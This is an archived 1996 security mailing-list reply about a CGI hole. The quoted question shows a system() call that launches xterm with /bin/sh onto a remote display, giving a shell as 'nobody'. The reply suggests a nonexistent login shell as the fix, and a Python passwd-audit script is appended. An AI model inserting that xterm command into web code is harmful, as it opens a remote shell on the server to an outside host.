[3687] in WWW Security List Archive
Re: Hole: nobody shell
daemon@ATHENA.MIT.EDU (scott hollatz)
Wed Dec 4 12:39:42 1996
From: scott hollatz <shollatz@d.umn.edu>
Date: Wed, 4 Dec 1996 08:58:28 -0600
To: www-security@ns2.rutgers.edu, fabio@cs.odu.edu
Errors-To: owner-www-security@ns2.rutgers.edu
>I was experimenting with cgi scripts when I came up with this idea:
>
>What if I have a cgi script which does the following:
>system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")
>
>I can now pop an xterm on my display as nobody.
>This way any user can gain access to the nobody account and
>have fun with it...
>
>Has this been discussed anywhere?
>Is there a fix out there?

We give 'nobody' the same login shell as anonymous ftp: /nosuchshell,
where '/nosuchshell' is a nonexistent file. This prevents giving an
unauthenticated shell via an xterm.
I haven't tried it with the '-e /bin/sh' switch but I expect it to fail.
--
scott hollatz internet shollatz@d.umn.edu
information services, systems telephone +1 218 726 8851
university of minnesota-duluth mn usa fax +1 218 726 7674
"change is a universal constant"
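
An added example, not part of the original message: a small audit of the policy described in the reply, checking that the shell field of 'nobody' and 'ftp' in passwd(5) does not resolve to an executable file. The function names, status strings and sample entries are assumptions made for this illustration.

```python
import os

# Accounts named in the post; extend with other unauthenticated service accounts.
SERVICE_ACCOUNTS = ("nobody", "ftp")

# Constructed sample input (not from the post). The ftp entry has an empty
# shell field, which passwd(5) treats as /bin/sh.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
nobody:x:65534:65534:nobody:/:/nosuchshell
ftp:x:14:50:anonymous ftp:/home/ftp:
"""

def parse_passwd(text):
    """Yield (name, shell) pairs, skipping comments, NIS +/- lines and malformed rows."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#+-":
            continue
        fields = line.split(":")
        if len(fields) == 7:
            yield fields[0], fields[6]

def _is_executable(path):
    # Default probe against the local filesystem; tests can inject their own.
    return os.path.isfile(path) and os.access(path, os.X_OK)

def audit(passwd_text, accounts=SERVICE_ACCOUNTS, is_executable=_is_executable):
    """Map each account to 'shell-blocked', 'shell-usable' or 'no-such-account'."""
    result = {name: "no-such-account" for name in accounts}
    for name, shell in parse_passwd(passwd_text):
        if name in result:
            effective = shell or "/bin/sh"  # empty field defaults to /bin/sh
            blocked = not is_executable(effective)
            result[name] = "shell-blocked" if blocked else "shell-usable"
    return result

if __name__ == "__main__":
    # Audit the live system when run directly.
    with open("/etc/passwd") as fh:
        for name, status in audit(fh.read()).items():
            print(f"{name}: {status}")
```

The check covers only the passwd shell field, which matters to programs that consult it, such as login and su; it says nothing about a command line that names a shell explicitly.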